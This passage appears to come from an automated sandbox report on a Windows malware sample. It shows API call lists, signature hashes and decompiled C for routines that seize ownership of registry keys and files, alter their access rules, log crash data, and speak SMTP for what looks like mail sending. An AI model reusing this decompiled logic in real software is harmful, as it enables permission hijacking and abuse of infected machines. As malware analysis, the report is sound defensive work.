                                                                                0x00407b72
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407b7b
                                                                                0x00407b84
                                                                                0x00407b86
                                                                                0x00407b88
                                                                                0x00407b8c
                                                                                0x00407b92
                                                                                0x00407b94
                                                                                0x00407b9c
                                                                                0x00407ba2
                                                                                0x00407ba4
                                                                                0x00407bab
                                                                                0x00407bab
                                                                                0x00407ba4
                                                                                0x00407bb2
                                                                                0x00407bb2
                                                                                0x00000000
                                                                                0x00407b88

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,004133B0,?), ref: 00407B16
                                                                                • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: D$PromptOnSecureDesktop
                                                                                • API String ID: 2976863881-1403908072
                                                                                • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02087CFC Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 02087D21
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 02087D46
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02087D7D
                                                                                • RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 02087DA2
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02087DC0
                                                                                • EqualSid.ADVAPI32(?,?), ref: 02087DD1
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 02087DE5
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02087DF3
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02087E03
                                                                                • RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 02087E12
                                                                                • LocalFree.KERNEL32(00000000), ref: 02087E19
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02087E35
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: D$PromptOnSecureDesktop
                                                                                • API String ID: 2976863881-1403908072
                                                                                • Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                • Instruction ID: c91c96f5e7614949d112064d2daf416f60de55ce0c3a00dbf0d7bca7b5f16cf0
                                                                                • Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                • Instruction Fuzzy Hash: 95A18B7690021DAFDB12DFA1DC88FEFBBB8FB08304F148169E541E6160D7758A84DB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406511 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 57%
                                                                                			E00406511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x61, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0040E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0040E318();
				return 1;
			}
























                                                                                0x00406511
                                                                                0x00406512
                                                                                0x0040651c
                                                                                0x00406521
                                                                                0x00406524
                                                                                0x00406532
                                                                                0x0040654d
                                                                                0x0040654f
                                                                                0x00406552
                                                                                0x00406564
                                                                                0x0040674e
                                                                                0x00406755
                                                                                0x00406755
                                                                                0x0040656d
                                                                                0x00406578
                                                                                0x00406587
                                                                                0x004065a3
                                                                                0x004065e3
                                                                                0x004065ee
                                                                                0x004065f9
                                                                                0x00406600
                                                                                0x00406606
                                                                                0x00406607
                                                                                0x00406608
                                                                                0x00406609
                                                                                0x0040660f
                                                                                0x0040661b
                                                                                0x0040661c
                                                                                0x0040661f
                                                                                0x00406620
                                                                                0x00406623
                                                                                0x00406626
                                                                                0x0040662c
                                                                                0x0040662f
                                                                                0x00406632
                                                                                0x00406639
                                                                                0x0040663a
                                                                                0x0040663d
                                                                                0x00406640
                                                                                0x0040668a
                                                                                0x0040668a
                                                                                0x00406696
                                                                                0x0040669e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406643
                                                                                0x00406648
                                                                                0x00406650
                                                                                0x00406671
                                                                                0x00406673
                                                                                0x00406676
                                                                                0x00406678
                                                                                0x00406678
                                                                                0x0040667a
                                                                                0x0040667d
                                                                                0x0040667e
                                                                                0x0040667f
                                                                                0x00406680
                                                                                0x00406681
                                                                                0x00406688
                                                                                0x00406689
                                                                                0x00000000
                                                                                0x00406689
                                                                                0x00000000
                                                                                0x00406648
                                                                                0x004066a0
                                                                                0x004066b3
                                                                                0x004066b5
                                                                                0x004066ba
                                                                                0x004066bd
                                                                                0x004066c7
                                                                                0x004066cc
                                                                                0x004066d1
                                                                                0x004066d7
                                                                                0x004066d7
                                                                                0x004066d8
                                                                                0x004066eb
                                                                                0x004066eb
                                                                                0x004066ff
                                                                                0x00406701
                                                                                0x00406704
                                                                                0x00406706
                                                                                0x00406706
                                                                                0x00406709
                                                                                0x0040670c
                                                                                0x0040671f
                                                                                0x00406734
                                                                                0x0040673c
                                                                                0x0040674b

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                • API String ID: 2400214276-165278494
                                                                                • Opcode ID: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
                                                                                • Instruction ID: d0bbb1ce902d37c6012dbda67fcae0275dd4f0eb650f6cdd038f268f1af807dd
                                                                                • Opcode Fuzzy Hash: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
                                                                                • Instruction Fuzzy Hash: FC615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A7C1 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299networkstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 49%
                                                                                			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				void* _t63;
				void* _t65;
				void* _t82;
				void* _t96;
				intOrPtr _t102;
				char _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				void* _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									if(E0040EE95( &_v1156,  &_v132) != 0) {
										break;
									}
									L34:
									_push(0);
									_push(0x3f6 - _t103);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								if(_t103 <= 3) {
									goto L34;
								}
								E0040EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							if(_t103 <= 5) {
								E0040EF00(_a16, "Too small respons\n");
							} else {
								E0040EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							if(_t103 < 5 ||  *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
								E0040EF00(_a16, "Incorrect respons");
								_push(7);
							} else {
								_t104 = E0040EDAC( &_v1156);
								if(_t104 == 0xdc || _t104 == 0xfa || _t104 == 0x162 || _t104 == 0xdd || _t104 == 0x14e || _t104 == 0xeb) {
									_t129 = 1;
									 *0x413668 = E0040EE95( &_v1156, "ESMTP") & 0xffffff00 | _t74 != 0x00000000;
									_t123 = 1;
								} else {
									_t129 = 0;
								}
								if(_t123 != 0xc || _t104 != 0x217) {
									if(_t129 != 0) {
										goto L23;
									}
									_t76 =  *0x413630;
									if( *0x413630 == 0 ||  *0x413634 == _t129 ||  *0x413638 == _t129) {
										L70:
										_push(0xb);
									} else {
										if(_t123 != 4 || E0040A699( &_v1156, _t76) == 0) {
											if(E0040A699( &_v1156,  *0x413634) == 0) {
												if(E0040A699( &_v1156,  *0x413638) == 0) {
													if(_t123 == 3 || _t123 == 4 || _t123 == 5 || _t123 == 6) {
														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
														_push( &_v132);
														if(E0040EE95( &_v1156, E0040A7A3(_t82, _t82)) != 0) {
															goto L62;
														}
													}
													goto L70;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
										} else {
											_push(8);
										}
									}
								} else {
									_push(0xf);
								}
							}
							goto L72;
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x413668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0040EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}


























                                                                                0x0040a7cb
                                                                                0x0040a7cf
                                                                                0x0040a7cf
                                                                                0x0040a7d3
                                                                                0x0040a7d9
                                                                                0x0040a87d
                                                                                0x0040a87e
                                                                                0x0040a886
                                                                                0x0040a88d
                                                                                0x0040a893
                                                                                0x0040a897
                                                                                0x0040a8c2
                                                                                0x0040a8f2
                                                                                0x0040a8f2
                                                                                0x0040a8f8
                                                                                0x0040a8fa
                                                                                0x0040a900
                                                                                0x0040a906
                                                                                0x0040a909
                                                                                0x0040a90a
                                                                                0x0040a978
                                                                                0x0040a97c
                                                                                0x0040a980
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a912
                                                                                0x0040a91a
                                                                                0x0040a9b9
                                                                                0x0040a9c2
                                                                                0x0040ab4a
                                                                                0x0040ab4a
                                                                                0x00000000
                                                                                0x0040ab4a
                                                                                0x0040a924
                                                                                0x0040a92c
                                                                                0x0040a954
                                                                                0x0040a968
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a96a
                                                                                0x0040a96e
                                                                                0x0040a970
                                                                                0x0040a971
                                                                                0x00000000
                                                                                0x0040a971
                                                                                0x0040a931
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a940
                                                                                0x0040a945
                                                                                0x0040a94c
                                                                                0x0040a952
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a952
                                                                                0x0040a982
                                                                                0x0040a988
                                                                                0x0040a89e
                                                                                0x0040a89e
                                                                                0x00000000
                                                                                0x0040a89e
                                                                                0x0040a991
                                                                                0x0040a9d1
                                                                                0x0040a993
                                                                                0x0040a99f
                                                                                0x0040a9a7
                                                                                0x0040a9aa
                                                                                0x0040a9aa
                                                                                0x0040a9db
                                                                                0x0040ab41
                                                                                0x0040ab48
                                                                                0x0040a9ef
                                                                                0x0040a9fb
                                                                                0x0040aa04
                                                                                0x0040aa40
                                                                                0x0040aa4d
                                                                                0x0040aa52
                                                                                0x0040aa2e
                                                                                0x0040aa2e
                                                                                0x0040aa2e
                                                                                0x0040aa57
                                                                                0x0040aa6a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa70
                                                                                0x0040aa77
                                                                                0x0040ab35
                                                                                0x0040ab35
                                                                                0x0040aa95
                                                                                0x0040aa98
                                                                                0x0040aaca
                                                                                0x0040aae6
                                                                                0x0040aaef
                                                                                0x0040ab12
                                                                                0x0040ab1a
                                                                                0x0040ab33
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ab33
                                                                                0x00000000
                                                                                0x0040aaef
                                                                                0x0040aae8
                                                                                0x00000000
                                                                                0x0040aae8
                                                                                0x0040aacc
                                                                                0x0040aacc
                                                                                0x0040aaad
                                                                                0x0040aaad
                                                                                0x0040aaad
                                                                                0x0040aa98
                                                                                0x0040aa61
                                                                                0x0040aa61
                                                                                0x0040aa61
                                                                                0x0040aa57
                                                                                0x00000000
                                                                                0x0040a9db
                                                                                0x0040a8c8
                                                                                0x0040a8d2
                                                                                0x0040a8d6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a8e2
                                                                                0x00000000
                                                                                0x0040a8eb
                                                                                0x0040a89c
                                                                                0x0040a8af
                                                                                0x0040a8b8
                                                                                0x00000000
                                                                                0x0040a8b8
                                                                                0x00000000
                                                                                0x0040a89c
                                                                                0x0040a7df
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a7ed
                                                                                0x0040a7f0
                                                                                0x0040a7f3
                                                                                0x0040a803
                                                                                0x0040a7f5
                                                                                0x0040a7f5
                                                                                0x0040a7f5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a845
                                                                                0x0040a848
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a852
                                                                                0x0040a855
                                                                                0x0040a84d
                                                                                0x0040a84d
                                                                                0x0040a7fa
                                                                                0x0040a7fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a85c
                                                                                0x0040a85e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a86a
                                                                                0x0040a86c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a80a
                                                                                0x0040a80c
                                                                                0x0040a871
                                                                                0x0040a871
                                                                                0x0040a874
                                                                                0x0040a875
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a813
                                                                                0x0040a816
                                                                                0x0040a816
                                                                                0x0040a819
                                                                                0x0040a819
                                                                                0x0040a81b
                                                                                0x0040a81c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a836
                                                                                0x0040a839
                                                                                0x0040a839
                                                                                0x0040a83c
                                                                                0x0040a83c
                                                                                0x0040a83e
                                                                                0x0040a83f
                                                                                0x0040a820
                                                                                0x0040a824
                                                                                0x0040a82f
                                                                                0x0040a87a
                                                                                0x0040a87a
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040A7FB
                                                                                • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                • wsprintfA.USER32 ref: 0040A8AF
                                                                                • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                • wsprintfA.USER32 ref: 0040A8E2
                                                                                • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                • wsprintfA.USER32 ref: 0040A9B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$send$lstrlenrecv
                                                                                • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                • API String ID: 3650048968-2394369944
                                                                                • Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                • Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02087A70 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 02087A96
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02087ACD
                                                                                • GetLengthSid.ADVAPI32(?), ref: 02087ADF
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 02087B01
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02087B1F
                                                                                • EqualSid.ADVAPI32(?,?), ref: 02087B39
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 02087B4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02087B58
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02087B68
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02087B77
                                                                                • LocalFree.KERNEL32(00000000), ref: 02087B7E
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02087B9A
                                                                                • GetAce.ADVAPI32(?,?,?), ref: 02087BCA
                                                                                • EqualSid.ADVAPI32(?,?), ref: 02087BF1
                                                                                • DeleteAce.ADVAPI32(?,?), ref: 02087C0A
                                                                                • EqualSid.ADVAPI32(?,?), ref: 02087C2C
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 02087CB1
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02087CBF
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02087CD0
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02087CE0
                                                                                • LocalFree.KERNEL32(00000000), ref: 02087CEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction ID: 991c8fe0ae6e99c1eaf19421a5fa049f30636ebbda74af3405e4848decb59f10
                                                                                • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction Fuzzy Hash: B0816C75900209AFDB12DFA4DD84FEFBBB8BF08304F14806AE645E7160DB759641DB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408328 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
